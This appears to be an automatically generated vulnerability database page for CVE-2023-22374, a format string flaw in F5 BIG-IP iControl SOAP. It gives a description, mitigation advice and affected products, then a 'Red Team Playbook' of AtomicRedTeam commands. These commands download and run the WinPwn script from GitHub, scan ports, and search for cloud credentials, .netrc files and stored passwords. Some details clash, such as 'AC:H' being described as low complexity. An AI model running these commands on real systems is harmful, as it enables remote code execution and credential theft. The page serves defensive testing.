CVE-2023-22374
Overview
This vulnerability is a format string flaw in the iControl SOAP interface of F5 BIG-IP products. It arises from improper handling of user-supplied input in format string functions within the iControl SOAP CGI process. The flaw specifically affects the iControl SOAP component, which processes authenticated SOAP requests, leading to potential memory corruption.
Vulnerability Description
A format string vulnerability exists in iControl SOAP that allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially execute arbitrary code. In appliance mode BIG-IP, a successful exploit of this vulnerability can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Impact
An authenticated attacker with low privileges can exploit this vulnerability to crash the iControl SOAP process, causing denial of service, or potentially execute arbitrary code, leading to privilege escalation and crossing security boundaries in appliance mode. Exploitation requires network access and authentication but no user interaction. The CVSS vector indicates high impact on confidentiality, integrity, and availability (C:H/I:H/A:H) with low attack complexity (AC:H) and limited privileges (PR:L).
Solution
F5 Networks recommends applying the patches provided in their advisory K000130415, which addresses the format string vulnerability in iControl SOAP. Affected versions of BIG-IP Access Policy Manager, including 13.1.5 and 17.0.0, should be updated to the fixed releases specified in the vendor's advisory. Administrators should consult the referenced F5 article for detailed patching instructions and verify that End of Technical Support versions are upgraded or replaced accordingly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A format string vulnerability has been identified in the iControl SOAP interface, which is utilized by several F5 BIG-IP products. This type of vulnerability arises when user input is improperly handled, allowing an attacker to manipulate the format string used in functions that process input data. In this case, an authenticated attacker can exploit the vulnerability to crash the iControl SOAP CGI process, leading to a denial of service. More critically, the attacker could potentially execute arbitrary code, which poses a significant risk to the integrity and confidentiality of the system. The affected products include various modules of the BIG-IP suite, such as the Access Policy Manager, Advanced Firewall Manager, and Application Security Manager, among others.
The attack vector for this vulnerability primarily involves authenticated users who can send specially crafted requests to the iControl SOAP interface. Once an attacker gains access to the system, they can exploit the format string vulnerability to manipulate the execution flow of the application. This could lead to the execution of arbitrary code, allowing the attacker to cross security boundaries and gain unauthorized access to sensitive data or system controls. Scenarios may include an attacker leveraging this vulnerability to escalate privileges, access confidential information, or disrupt services by crashing the CGI process, thereby impacting the availability of critical applications.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on F5 BIG-IP products for application delivery and security. The potential for arbitrary code execution means that attackers could gain control over affected systems, leading to data breaches, service disruptions, and significant financial losses. Furthermore, the exploitation of this vulnerability could result in reputational damage, regulatory penalties, and loss of customer trust. Organizations that fail to address this vulnerability may find themselves at a heightened risk of targeted attacks, especially given the critical role that these products play in managing network traffic and securing applications.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected products is crucial, as software vendors often release security updates to address known vulnerabilities. Additionally, organizations should conduct security assessments and penetration testing to identify potential weaknesses in their systems. Monitoring logs for unusual activity, especially from authenticated users, can help detect exploitation attempts early. Implementing strict access controls and user authentication measures can also reduce the risk of unauthorized access to the iControl SOAP interface. Finally, educating staff about secure coding practices can help prevent the introduction of similar vulnerabilities in the future.
In conclusion, the format string vulnerability in the iControl SOAP interface presents a serious threat to the security and stability of F5 BIG-IP products. The potential for exploitation by authenticated users highlights the need for organizations to prioritize security measures and maintain vigilance against emerging threats. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against potential attacks and safeguard their critical assets.
Affected Products (56)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | 13.1.5 |
cpe:2.3:a:f5:big-ip_access_policy_manager:13.1.5:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | 17.0.0 |
cpe:2.3:a:f5:big-ip_access_policy_manager:17.0.0:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | 13.1.5 |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:13.1.5:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | 17.0.0 |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:17.0.0:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | 13.1.5 |
cpe:2.3:a:f5:big-ip_analytics:13.1.5:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | 17.0.0 |
cpe:2.3:a:f5:big-ip_analytics:17.0.0:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | 13.1.5 |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:13.1.5:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | 17.0.0 |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.0.0:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Security Manager | All |
cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-135 | Format String Injection |
51%
|
High | High | |
| CAPEC-67 | String Format Overflow in syslog() |
35%
|
High | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-22374 |
| my.f5.com |
GitHub CVE
|
https://my.f5.com/manage/s/article/K000130415 |